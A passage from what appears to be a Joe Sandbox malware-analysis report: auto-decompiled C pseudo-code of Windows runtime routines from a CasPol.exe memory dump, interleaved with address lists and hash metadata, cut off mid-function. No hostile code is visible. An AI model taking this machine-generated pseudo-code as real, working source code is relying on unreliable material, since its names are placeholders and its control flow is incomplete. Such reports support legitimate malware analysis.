				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E014395D0();
							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0140EB70(_t54, 0x14e79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E014395D0();
								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0140EB70(_t54, 0x14e79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0143F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0140EB70(_t54, 0x14e79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E014395D0();
							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                  0x013f5220
                                                                  0x013f5224
                                                                  0x01450d13
                                                                  0x01450d16
                                                                  0x01450d19
                                                                  0x013f522a
                                                                  0x013f522a
                                                                  0x013f522d
                                                                  0x013f522d
                                                                  0x013f5231
                                                                  0x013f5235
                                                                  0x013f5239
                                                                  0x01450d5c
                                                                  0x01450d62
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01450d6a
                                                                  0x01450d7b
                                                                  0x01450d7f
                                                                  0x01450d81
                                                                  0x01450d84
                                                                  0x01450d95
                                                                  0x01450d95
                                                                  0x01450d6c
                                                                  0x01450d71
                                                                  0x01450d71
                                                                  0x01450d9a
                                                                  0x00000000
                                                                  0x013f524a
                                                                  0x013f524a
                                                                  0x013f5250
                                                                  0x01450d24
                                                                  0x01450d35
                                                                  0x01450d39
                                                                  0x01450d3b
                                                                  0x01450d3e
                                                                  0x01450d50
                                                                  0x01450d50
                                                                  0x01450d26
                                                                  0x01450d2b
                                                                  0x01450d2b
                                                                  0x00000000
                                                                  0x01450d55
                                                                  0x013f5256
                                                                  0x013f525b
                                                                  0x013f5265
                                                                  0x01450da7
                                                                  0x013f526b
                                                                  0x013f526e
                                                                  0x013f5272
                                                                  0x01450db1
                                                                  0x01450db4
                                                                  0x01450dc5
                                                                  0x01450dc5
                                                                  0x013f5272
                                                                  0x013f5278
                                                                  0x013f527e
                                                                  0x013f528a
                                                                  0x013f528c
                                                                  0x013f528d
                                                                  0x00000000
                                                                  0x013f5280
                                                                  0x013f5282
                                                                  0x013f5288
                                                                  0x013f529f
                                                                  0x013f5292
                                                                  0x00000000
                                                                  0x013f5292
                                                                  0x00000000
                                                                  0x013f5288
                                                                  0x013f527e

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 224b9b1eee732597972d20a42388ed2e30d73d228b83a5678f4924c3ab60e8f4
                                                                  • Instruction ID: 16a43d98edde6b2b373593d9bbf3ad61567f191c46412532f7db88fc98b1fd91
                                                                  • Opcode Fuzzy Hash: 224b9b1eee732597972d20a42388ed2e30d73d228b83a5678f4924c3ab60e8f4
                                                                  • Instruction Fuzzy Hash: 37312436241A01EBC762AB19C880F6A7BA5FF60765F114B2FF9550B6F1DB70F805C690
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01433D43 Relevance: .1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E01433D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E01407B60(0, _t61, 0x13d11c4);
						_v12 =  *_t47;
						_v12 = _v12 + 0xfff8;
						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
						E01407B60(0xfff8, _t61,  &_v12);
						_t33 = _a8;
						if(_t33 != 0) {
							 *_t33 = _t61;
						}
						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
						_t53 = _a12;
						if(_t53 != 0) {
							_t57 = _t61[2];
							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
							while(_t38 >= _t57) {
								if( *_t38 == 0x5c) {
									_t41 = _t38 + 2;
									if(_t41 == 0) {
										break;
									}
									_t58 = 0;
									if( *_t41 == 0) {
										L19:
										 *_t53 = _t58;
										goto L7;
									}
									 *_t53 = _t41;
									goto L7;
								}
								_t38 = _t38 - 2;
							}
							_t58 = 0;
							goto L19;
						} else {
							L7:
							_t39 = _a16;
							if(_t39 != 0) {
								 *_t39 = 0;
								 *((intOrPtr*)(_t39 + 4)) = 0;
								 *((intOrPtr*)(_t39 + 8)) = 0;
								 *((intOrPtr*)(_t39 + 0xc)) = 0;
							}
							return 0;
						}
					}
					_t61 = _a4;
					if(_t61 != 0) {
						L3:
						_t43 = L01414620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
						_t61[2] = _t43;
						if(_t43 == 0) {
							return 0xc0000017;
						}
						_t61[1] = _t60;
						 *_t61 = 0;
						goto L5;
					}
					goto L22;
				}
				_t61 = _a4;
				if(_t61 == 0) {
					return 0xc000000d;
				}
				goto L3;
			}
















                                                                  0x01433d4c
                                                                  0x01433d50
                                                                  0x01433d55
                                                                  0x01433d5e
                                                                  0x0146e79a
                                                                  0x00000000
                                                                  0x0146e79a
                                                                  0x01433d68
                                                                  0x0146e789
                                                                  0x01433d9d
                                                                  0x01433da3
                                                                  0x01433daf
                                                                  0x01433db5
                                                                  0x01433dbc
                                                                  0x01433dc4
                                                                  0x01433dc9
                                                                  0x01433dce
                                                                  0x0146e7ae
                                                                  0x0146e7ae
                                                                  0x01433dde
                                                                  0x01433de2
                                                                  0x01433de7
                                                                  0x01433e0d
                                                                  0x01433e13
                                                                  0x01433e16
                                                                  0x01433e1e
                                                                  0x01433e25
                                                                  0x01433e28
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01433e2a
                                                                  0x01433e2f
                                                                  0x01433e37
                                                                  0x01433e37
                                                                  0x00000000
                                                                  0x01433e37
                                                                  0x01433e31
                                                                  0x00000000
                                                                  0x01433e31
                                                                  0x01433e20
                                                                  0x01433e20
                                                                  0x01433e35
                                                                  0x00000000
                                                                  0x01433de9
                                                                  0x01433de9
                                                                  0x01433de9
                                                                  0x01433dee
                                                                  0x01433dfd
                                                                  0x01433dff
                                                                  0x01433e02
                                                                  0x01433e05
                                                                  0x01433e05
                                                                  0x00000000
                                                                  0x01433df0
                                                                  0x01433de7
                                                                  0x0146e78f
                                                                  0x0146e794
                                                                  0x01433d79
                                                                  0x01433d84
                                                                  0x01433d89
                                                                  0x01433d8e
                                                                  0x00000000
                                                                  0x0146e7a4
                                                                  0x01433d96
                                                                  0x01433d9a
                                                                  0x00000000
                                                                  0x01433d9a
                                                                  0x00000000
                                                                  0x0146e794
                                                                  0x01433d6e
                                                                  0x01433d73
                                                                  0x00000000
                                                                  0x0146e7b5
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d291a1cfe06de33bf6925d8615fdf06b198af4d15ad0ee321aa595be5f926484
                                                                  • Instruction ID: ae7586146a7137064511215b897b704aefbc9c47c5080d7535af612605595867
                                                                  • Opcode Fuzzy Hash: d291a1cfe06de33bf6925d8615fdf06b198af4d15ad0ee321aa595be5f926484
                                                                  • Instruction Fuzzy Hash: A831DC35A006119BC725CF2EC846A6BBBE5FF88710B05806FE94ACB370E634D842C7A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 0141C182 Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 68%
                                                                  			E0141C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E01417D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = L014C8D34(_v8, _t80);
					}
					E01412280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						L0140FFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E014C8833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						L0140FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E0143B180();
						if(_a4 != 0) {
							E01412280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E0141BB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E0141BB2D(_t16, _t15);
						E0141B944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						L0140FFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							L0140FFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					L0140FFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                                                  0x0141c18d
                                                                  0x0141c18f
                                                                  0x0141c191
                                                                  0x0141c19b
                                                                  0x0141c1a0
                                                                  0x0141c1d4
                                                                  0x0141c1de
                                                                  0x01462d6e
                                                                  0x0141c1e4
                                                                  0x0141c1e4
                                                                  0x0141c1e4
                                                                  0x0141c1ec
                                                                  0x01462d7d
                                                                  0x01462d7d
                                                                  0x0141c1f3
                                                                  0x0141c1ff
                                                                  0x01462d88
                                                                  0x01462d8d
                                                                  0x01462d94
                                                                  0x01462d94
                                                                  0x01462d9f
                                                                  0x01462da4
                                                                  0x01462dab
                                                                  0x01462db0
                                                                  0x01462db2
                                                                  0x01462db3
                                                                  0x01462db4
                                                                  0x01462dbc
                                                                  0x01462dc3
                                                                  0x01462dc3
                                                                  0x0141c205
                                                                  0x0141c205
                                                                  0x0141c208
                                                                  0x0141c20e
                                                                  0x0141c211
                                                                  0x0141c216
                                                                  0x0141c219
                                                                  0x0141c21f
                                                                  0x0141c222
                                                                  0x0141c22c
                                                                  0x0141c234
                                                                  0x0141c23a
                                                                  0x0141c23f
                                                                  0x0141c245
                                                                  0x0141c24b
                                                                  0x0141c251
                                                                  0x0141c25a
                                                                  0x0141c276
                                                                  0x0141c27d
                                                                  0x0141c27d
                                                                  0x0141c25c
                                                                  0x0141c25c
                                                                  0x00000000
                                                                  0x0141c25e
                                                                  0x0141c1a4
                                                                  0x0141c1aa
                                                                  0x0141c1b3
                                                                  0x0141c265
                                                                  0x0141c26c
                                                                  0x0141c26c
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                  • Instruction ID: a3cb747ccdf53d73ad800aa90ce11a8a2e8cba8712a7d2ae789f7630eb07445a
                                                                  • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                                                  • Instruction Fuzzy Hash: 76311671A81547BBD715EBB6C890BEAF764BF62204F04416FC41C87365DB386A0ACBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01477016 Relevance: .1, Instructions: 104COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 76%
                                                                  			E01477016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x14ed360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01476B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01476B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E01417D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E01439AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return L0143B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L01414620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                                                  0x01477016
                                                                  0x0147701e
                                                                  0x0147702b
                                                                  0x01477033
                                                                  0x01477037
                                                                  0x0147703c
                                                                  0x0147703e
                                                                  0x01477041
                                                                  0x01477045
                                                                  0x0147704a
                                                                  0x01477050
                                                                  0x01477055
                                                                  0x0147705a
                                                                  0x01477062
                                                                  0x01477062
                                                                  0x0147705a
                                                                  0x01477064
                                                                  0x01477064
                                                                  0x01477067
                                                                  0x01477071
                                                                  0x01477096
                                                                  0x0147709b
                                                                  0x014770a2
                                                                  0x014770a6
                                                                  0x014770a7
                                                                  0x014770ad
                                                                  0x014770b3
                                                                  0x014770b6
                                                                  0x014770bb
                                                                  0x014770c3
                                                                  0x014770c3
                                                                  0x014770c6
                                                                  0x014770cd
                                                                  0x014770dd
                                                                  0x014770e0
                                                                  0x014770e2
                                                                  0x014770e2
                                                                  0x014770ee
                                                                  0x01477101
                                                                  0x014770f0
                                                                  0x014770f9
                                                                  0x014770f9
                                                                  0x0147710a
                                                                  0x0147710e
                                                                  0x01477112
                                                                  0x01477117
                                                                  0x01477118
                                                                  0x01477118
                                                                  0x014770bb
                                                                  0x0147711d
                                                                  0x01477123
                                                                  0x01477131
                                                                  0x01477131
                                                                  0x01477136
                                                                  0x0147713d
                                                                  0x0147713e
                                                                  0x0147713f
                                                                  0x0147714a
                                                                  0x0147714a
                                                                  0x01477084
                                                                  0x01477088
                                                                  0x00000000
                                                                  0x0147708e
                                                                  0x0147708e
                                                                  0x01477092
                                                                  0x00000000
                                                                  0x01477092

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cc007f3044028a4428e02a4a9047b92b36f57703fd20714d6d08a154055cf9b3
                                                                  • Instruction ID: cb9f8851b508d77de87d939ebbb802a111c22930e8d23a063636d01a254db1b6
                                                                  • Opcode Fuzzy Hash: cc007f3044028a4428e02a4a9047b92b36f57703fd20714d6d08a154055cf9b3
                                                                  • Instruction Fuzzy Hash: BA31E6726047919BC321DF28C844AABB7E5FFD8700F054A2EF995877A0E730E904CBA5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 014261A0 Relevance: .1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 97%
                                                                  			E014261A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = L01425E50(0x13d67cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							L014C9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						L013FF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                                                  0x014261b3
                                                                  0x014261b5
                                                                  0x014261bd
                                                                  0x014261c3
                                                                  0x014261c7
                                                                  0x014261d2
                                                                  0x014261ff
                                                                  0x014261ff
                                                                  0x01426201
                                                                  0x01426207
                                                                  0x01426207
                                                                  0x014261d4
                                                                  0x014261d9
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014261df
                                                                  0x014261e2
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x014261e6
                                                                  0x014261e8
                                                                  0x014261ee
                                                                  0x014261ee
                                                                  0x014261f9
                                                                  0x0146762f
                                                                  0x01467632
                                                                  0x01467635
                                                                  0x01467639
                                                                  0x01467640
                                                                  0x0146766e
                                                                  0x01467675
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x01467681
                                                                  0x01467689
                                                                  0x0146768d
                                                                  0x01467691
                                                                  0x01467695
                                                                  0x01467699
                                                                  0x014676af
                                                                  0x014676b5
                                                                  0x014676b7
                                                                  0x014676b7
                                                                  0x014676d7
                                                                  0x014676dc
                                                                  0x00000000
                                                                  0x014676dc
                                                                  0x014676a2
                                                                  0x014676a9
                                                                  0x01467651
                                                                  0x01467653
                                                                  0x01467653
                                                                  0x01467656
                                                                  0x01467656
                                                                  0x00000000
                                                                  0x01467656
                                                                  0x01467644
                                                                  0x01467646
                                                                  0x01467648
                                                                  0x01467648
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0a291524e9b21f76d22cfc6f8e1a0b46badb7ab2a05df3e0ef0450ce2d9f68ba
                                                                  • Instruction ID: 9b4382f418b08edb2148f718081afb9bf73285d457b7bd3f4cf51b20105ff948
                                                                  • Opcode Fuzzy Hash: 0a291524e9b21f76d22cfc6f8e1a0b46badb7ab2a05df3e0ef0450ce2d9f68ba
                                                                  • Instruction Fuzzy Hash: 47315C716057118FE360CF1DC840B27BBE8EB98B18F55496EE99897361E7B0EC44CB92
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 013FAA16 Relevance: .1, Instructions: 93COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 95%
                                                                  			E013FAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x14ed360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x14e7b9c; // 0x0
					_t53 = L01414620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return L0143B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E0143F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L01406C59(_t53, _t51, _t58) != 0) {
							_t28 = L01425E50(0x13dc338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E0142B230(_v32, _v28, 0x13dc2d8, 1,  &_v24);
								_t28 = L013FF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                                                  0x013faa25
                                                                  0x013faa29
                                                                  0x013faa2d
                                                                  0x013faa30
                                                                  0x013faa37
                                                                  0x013faa3c
                                                                  0x01454458
                                                                  0x01454458
                                                                  0x01454472
                                                                  0x01454474
                                                                  0x01454476
                                                                  0x013faa64
                                                                  0x013faa74
                                                                  0x0145447c
                                                                  0x01454483
                                                                  0x01454492
                                                                  0x013faa52
                                                                  0x013faa54
                                                                  0x013faa5e
                                                                  0x014544a8
                                                                  0x014544ad
                                                                  0x014544af
                                                                  0x014544b6
                                                                  0x014544b6
                                                                  0x014544b9
                                                                  0x014544bc
                                                                  0x014544cd
                                                                  0x014544d3
                                                                  0x014544d6
                                                                  0x014544e1
                                                                  0x014544e1
                                                                  0x014544e6
                                                                  0x014544e8
                                                                  0x014544fb
                                                                  0x014544fb
                                                                  0x014544e8
                                                                  0x00000000
                                                                  0x013faa5e
                                                                  0x01454476
                                                                  0x013faa42
                                                                  0x013faa46
                                                                  0x013faa48
                                                                  0x013faa4c
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.285640496.00000000013D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_13d0000_CasPol.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ac4cd60a833c967fadeb2d7891b08b399f17531744b943d57c8dfadafa04384e
                                                                  • Instruction ID: db87bbd4c12852c62254985baf33dabc9b3f4c29aaea4e6223f32e8e4be02e87
                                                                  • Opcode Fuzzy Hash: ac4cd60a833c967fadeb2d7891b08b399f17531744b943d57c8dfadafa04384e
                                                                  • Instruction Fuzzy Hash: E2310372A0021AABDF11DFA9CD41ABFB7B8EF14700F04406EF905EB261E7349954CBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 01434A2C Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 58%
                                                                  			E01434A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x14ed360 ^ _t62;
				_v8 =  *0x14ed360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E01412280(_t26, 0x14e8608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						L0140FFB0(_t41, _t51, 0x14e8608);
						L2:
						 *0x14eb1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
